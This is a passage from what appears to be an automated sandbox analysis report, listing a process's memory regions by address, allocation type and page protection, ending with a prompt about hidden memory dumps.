page execute and read and write
|
||
|
5660000
|
trusted library allocation
|
page execute and read and write
|
||
|
49B8000
|
trusted library allocation
|
page read and write
|
||
|
154B000
|
stack
|
page read and write
|
||
|
2966000
|
trusted library allocation
|
page read and write
|
||
|
626D000
|
stack
|
page read and write
|
||
|
4F38000
|
trusted library allocation
|
page read and write
|
||
|
3AF4000
|
trusted library allocation
|
page read and write
|
||
|
1124000
|
trusted library allocation
|
page read and write
|
||
|
4124000
|
trusted library allocation
|
page read and write
|
||
|
107E000
|
stack
|
page read and write
|
||
|
C6B000
|
heap
|
page read and write
|
||
|
BBE000
|
unkown
|
page read and write
|
||
|
6AB0000
|
trusted library allocation
|
page read and write
|
||
|
A8B0000
|
heap
|
page read and write
|
||
|
6AD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
564B000
|
stack
|
page read and write
|
||
|
7DD000
|
stack
|
page read and write
|
||
|
1106000
|
trusted library allocation
|
page execute and read and write
|
||
|
BFA000
|
trusted library allocation
|
page execute and read and write
|
||
|
480000
|
heap
|
page read and write
|
||
|
2760000
|
heap
|
page read and write
|
||
|
C02000
|
trusted library allocation
|
page read and write
|
||
|
C75000
|
heap
|
page read and write
|
||
|
112D000
|
trusted library allocation
|
page execute and read and write
|
||
|
70E0000
|
heap
|
page read and write
|
||
|
A83C000
|
stack
|
page read and write
|
||
|
4DB6000
|
trusted library allocation
|
page read and write
|
||
|
160B000
|
trusted library allocation
|
page read and write
|
||
|
2964000
|
trusted library allocation
|
page read and write
|
||
|
BF2000
|
trusted library allocation
|
page read and write
|
||
|
6ED0000
|
trusted library allocation
|
page execute and read and write
|
||
|
43A000
|
stack
|
page read and write
|
||
|
10BE000
|
stack
|
page read and write
|
||
|
29F9000
|
trusted library allocation
|
page read and write
|
||
|
A6AD000
|
stack
|
page read and write
|
||
|
137D000
|
trusted library allocation
|
page execute and read and write
|
||
|
5AF0000
|
trusted library allocation
|
page read and write
|
||
|
10D0000
|
trusted library allocation
|
page read and write
|
||
|
A5BE000
|
trusted library allocation
|
page read and write
|
||
|
1100000
|
trusted library allocation
|
page read and write
|
||
|
A50000
|
heap
|
page read and write
|
||
|
549C000
|
heap
|
page read and write
|
||
|
1373000
|
trusted library allocation
|
page read and write
|
||
|
2A4F000
|
trusted library allocation
|
page read and write
|
||
|
1173000
|
heap
|
page read and write
|
||
|
6EF0000
|
trusted library allocation
|
page read and write
|
||
|
520000
|
heap
|
page read and write
|
||
|
2F88000
|
trusted library allocation
|
page read and write
|
||
|
5561000
|
heap
|
page read and write
|
||
|
BD0000
|
trusted library allocation
|
page read and write
|
||
|
1570000
|
trusted library allocation
|
page read and write
|
||
|
51E3000
|
heap
|
page execute and read and write
|
||
|
EBD000
|
trusted library allocation
|
page execute and read and write
|
||
|
501D000
|
stack
|
page read and write
|
||
|
4F9B000
|
trusted library allocation
|
page read and write
|
||
|
6780000
|
trusted library allocation
|
page read and write
|
||
|
C07000
|
trusted library allocation
|
page execute and read and write
|
||
|
510000
|
heap
|
page read and write
|
||
|
10F3000
|
trusted library allocation
|
page read and write
|
||
|
3AFE000
|
trusted library allocation
|
page read and write
|
||
|
AAAE000
|
stack
|
page read and write
|
||
|
6379000
|
heap
|
page read and write
|
||
|
60AE000
|
stack
|
page read and write
|
||
|
4F90000
|
trusted library allocation
|
page read and write
|
||
|
3F39000
|
trusted library allocation
|
page read and write
|
||
|
5DAE000
|
stack
|
page read and write
|
||
|
7BBE000
|
stack
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
5440000
|
heap
|
page read and write
|
||
|
1370000
|
trusted library allocation
|
page read and write
|
||
|
502C000
|
stack
|
page read and write
|
||
|
4F9E000
|
trusted library allocation
|
page read and write
|
||
|
7300000
|
trusted library allocation
|
page read and write
|
||
|
539D000
|
trusted library allocation
|
page read and write
|
||
|
E2E000
|
stack
|
page read and write
|
||
|
29A5000
|
trusted library allocation
|
page read and write
|
||
|
13C0000
|
heap
|
page read and write
|
||
|
9A7000
|
stack
|
page read and write
|
||
|
63D9000
|
heap
|
page read and write
|
||
|
67B0000
|
trusted library allocation
|
page read and write
|
||
|
4D94000
|
trusted library allocation
|
page read and write
|
||
|
EA4000
|
trusted library allocation
|
page read and write
|
||
|
297E000
|
trusted library allocation
|
page read and write
|
||
|
3B0A000
|
trusted library allocation
|
page read and write
|
||
|
677E000
|
stack
|
page read and write
|
||
|
57F0000
|
heap
|
page read and write
|
||
|
759E000
|
stack
|
page read and write
|
||
|
CFA000
|
heap
|
page read and write
|
||
|
28C5000
|
trusted library allocation
|
page execute and read and write
|
||
|
9F0000
|
heap
|
page read and write
|
||
|
1130000
|
heap
|
page read and write
|
||
|
8A9000
|
stack
|
page read and write
|
||
|
FB0000
|
heap
|
page read and write
|
||
|
CF5000
|
heap
|
page read and write
|
||
|
55A5000
|
heap
|
page read and write
|
||
|
2AE1000
|
trusted library allocation
|
page read and write
|
||
|
A80000
|
heap
|
page read and write
|
||
|
410C000
|
trusted library allocation
|
page read and write
|
||
|
5650000
|
heap
|
page read and write
|
||
|
5C6E000
|
stack
|
page read and write
|
||
|
110A000
|
trusted library allocation
|
page execute and read and write
|
||
|
AA7E000
|
stack
|
page read and write
|
||
|
5374000
|
trusted library allocation
|
page read and write
|
||
|
646E000
|
stack
|
page read and write
|
||
|
C10000
|
heap
|
page read and write
|
||
|
738E000
|
stack
|
page read and write
|
||
|
4156000
|
trusted library allocation
|
page read and write
|
||
|
7CFE000
|
stack
|
page read and write
|
||
|
136E000
|
stack
|
page read and write
|
||
|
62EE000
|
stack
|
page read and write
|
||
|
1626000
|
trusted library allocation
|
page read and write
|
||
|
10ED000
|
trusted library allocation
|
page execute and read and write
|
||
|
38A7000
|
trusted library allocation
|
page read and write
|
||
|
2930000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
1138000
|
heap
|
page read and write
|
||
|
536D000
|
stack
|
page read and write
|
||
|
77AE000
|
stack
|
page read and write
|
||
|
75DD000
|
stack
|
page read and write
|
||
|
C37000
|
heap
|
page read and write
|
||
|
509E000
|
stack
|
page read and write
|
||
|
5103000
|
heap
|
page read and write
|
||
|
67E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
71EE000
|
stack
|
page read and write
|
||
|
6361000
|
heap
|
page read and write
|
||
|
BBE000
|
stack
|
page read and write
|
||
|
10E3000
|
trusted library allocation
|
page execute and read and write
|
||
|
602E000
|
stack
|
page read and write
|
||
|
1095000
|
heap
|
page read and write
|
||
|
2951000
|
trusted library allocation
|
page read and write
|
||
|
C3E000
|
stack
|
page read and write
|
||
|
1140000
|
heap
|
page read and write
|
||
|
4FD0000
|
trusted library allocation
|
page read and write
|
||
|
1174000
|
heap
|
page read and write
|
||
|
D60000
|
heap
|
page read and write
|
||
|
ACEE000
|
stack
|
page read and write
|
||
|
A8C1000
|
heap
|
page read and write
|
||
|
1390000
|
trusted library allocation
|
page read and write
|
||
|
54C5000
|
heap
|
page read and write
|
||
|
77EE000
|
stack
|
page read and write
|
||
|
3A71000
|
trusted library allocation
|
page read and write
|
||
|
4FB0000
|
trusted library allocation
|
page read and write
|
||
|
1020000
|
heap
|
page read and write
|
||
|
4FD4000
|
trusted library allocation
|
page read and write
|
||
|
5880000
|
heap
|
page read and write
|
||
|
6AF0000
|
heap
|
page read and write
|
||
|
270E000
|
stack
|
page read and write
|
||
|
67DD000
|
trusted library allocation
|
page read and write
|
||
|
6130000
|
heap
|
page read and write
|
||
|
4DD0000
|
trusted library allocation
|
page read and write
|
||
|
5543000
|
heap
|
page read and write
|
||
|
6F90000
|
heap
|
page read and write
|
||
|
1632000
|
trusted library allocation
|
page read and write
|
||
|
FFE000
|
stack
|
page read and write
|
||
|
2A5D000
|
trusted library allocation
|
page read and write
|
||
|
3A99000
|
trusted library allocation
|
page read and write
|
||
|
B70000
|
heap
|
page read and write
|
||
|
10F0000
|
trusted library allocation
|
page read and write
|
||
|
1159000
|
heap
|
page read and write
|
||
|
292E000
|
stack
|
page read and write
|
||
|
108D000
|
stack
|
page read and write
|
||
|
2958000
|
trusted library allocation
|
page read and write
|
||
|
1550000
|
trusted library allocation
|
page execute and read and write
|
||
|
D67000
|
heap
|
page read and write
|
||
|
55A3000
|
heap
|
page read and write
|
||
|
F2F000
|
stack
|
page read and write
|
||
|
1112000
|
trusted library allocation
|
page read and write
|
||
|
1120000
|
trusted library allocation
|
page read and write
|
||
|
5FED000
|
unkown
|
page read and write
|
||
|
5391000
|
trusted library allocation
|
page read and write
|
||
|
299D000
|
trusted library allocation
|
page read and write
|
||
|
5A0E000
|
stack
|
page read and write
|
||
|
1000000
|
heap
|
page read and write
|
||
|
29E9000
|
trusted library allocation
|
page read and write
|
||
|
2EFE000
|
stack
|
page read and write
|
||
|
5420000
|
trusted library allocation
|
page read and write
|
||
|
540E000
|
stack
|
page read and write
|
||
|
5FEE000
|
stack
|
page read and write
|
||
|
70EE000
|
stack
|
page read and write
|
||
|
F37000
|
stack
|
page read and write
|
||
|
2A60000
|
heap
|
page execute and read and write
|
||
|
6190000
|
heap
|
page read and write
|
||
|
5845000
|
heap
|
page read and write
|
||
|
2A6B000
|
trusted library allocation
|
page read and write
|
||
|
4FBD000
|
trusted library allocation
|
page read and write
|
||
|
1650000
|
heap
|
page read and write
|
||
|
5850000
|
heap
|
page read and write
|
||
|
10FE000
|
stack
|
page read and write
|
||
|
1621000
|
trusted library allocation
|
page read and write
|
||
|
53F0000
|
heap
|
page read and write
|
||
|
A8AD000
|
stack
|
page read and write
|
||
|
8AA0000
|
heap
|
page read and write
|
||
|
5452000
|
trusted library allocation
|
page read and write
|
||
|
1110000
|
trusted library allocation
|
page read and write
|
||
|
73A0000
|
trusted library allocation
|
page read and write
|
||
|
13E5000
|
trusted library allocation
|
page read and write
|
||
|
54B0000
|
heap
|
page read and write
|
||
|
4152000
|
trusted library allocation
|
page read and write
|
||
|
10E0000
|
trusted library allocation
|
page read and write
|
||
|
2B0A000
|
trusted library allocation
|
page read and write
|
||
|
56E0000
|
trusted library section
|
page read and write
|
||
|
EC7000
|
heap
|
page read and write
|
||
|
29DD000
|
trusted library allocation
|
page read and write
|
||
|
4AAE000
|
stack
|
page read and write
|
||
|
BFF000
|
unkown
|
page read and write
|
||
|
113E000
|
heap
|
page read and write
|
||
|
AABE000
|
stack
|
page read and write
|
||
|
13E0000
|
trusted library allocation
|
page read and write
|
||
|
1595000
|
trusted library allocation
|
page read and write
|
||
|
5396000
|
trusted library allocation
|
page read and write
|
||
|
6DCD000
|
stack
|
page read and write
|
||
|
4C4D000
|
stack
|
page read and write
|
||
|
78EE000
|
stack
|
page read and write
|
||
|
1580000
|
trusted library allocation
|
page read and write
|
||
|
28B2000
|
trusted library allocation
|
page read and write
|
||
|
5D6E000
|
stack
|
page read and write
|
||
|
4AEE000
|
stack
|
page read and write
|
||
|
505D000
|
stack
|
page read and write
|
||
|
812E000
|
stack
|
page read and write
|
||
|
5450000
|
trusted library section
|
page readonly
|
||
|
2C2E000
|
trusted library allocation
|
page read and write
|
||
|
667E000
|
stack
|
page read and write
|
||
|
2946000
|
trusted library allocation
|
page read and write
|
||
|
13C6000
|
trusted library allocation
|
page read and write
|
||
|
4CE000
|
unkown
|
page read and write
|
||
|
6790000
|
trusted library allocation
|
page execute and read and write
|
||
|
1386000
|
trusted library allocation
|
page execute and read and write
|
||
|
57DD000
|
stack
|
page read and write
|
||
|
1102000
|
trusted library allocation
|
page read and write
|
||
|
53A0000
|
trusted library allocation
|
page read and write
|
||
|
54D0000
|
heap
|
page read and write
|
||
|
CE1000
|
heap
|
page read and write
|
||
|
719D000
|
stack
|
page read and write
|
||
|
2EE8000
|
trusted library allocation
|
page read and write
|
||
|
7EF10000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DFE000
|
stack
|
page read and write
|
||
|
5670000
|
trusted library allocation
|
page read and write
|
||
|
1148000
|
heap
|
page read and write
|
||
|
11DD000
|
heap
|
page read and write
|
||
|
1360000
|
heap
|
page execute and read and write
|
||
|
2AE5000
|
trusted library allocation
|
page read and write
|
||
|
A370000
|
heap
|
page read and write
|
||
|
1176000
|
heap
|
page read and write
|
||
|
8AB0000
|
heap
|
page read and write
|
||
|
5470000
|
heap
|
page read and write
|
||
|
2E70000
|
heap
|
page execute and read and write
|
||
|
4FA2000
|
trusted library allocation
|
page read and write
|
||
|
610000
|
heap
|
page read and write
|
||
|
5450000
|
trusted library allocation
|
page read and write
|
||
|
162D000
|
trusted library allocation
|
page read and write
|
||
|
3021000
|
trusted library allocation
|
page read and write
|
||
|
E8E000
|
stack
|
page read and write
|
||
|
63EE000
|
stack
|
page read and write
|
||
|
739A000
|
trusted library allocation
|
page read and write
|
||
|
2AF1000
|
trusted library allocation
|
page read and write
|
||
|
29A9000
|
trusted library allocation
|
page read and write
|
||
|
13C4000
|
trusted library allocation
|
page read and write
|
There are 577 hidden memdumps, click here to show them.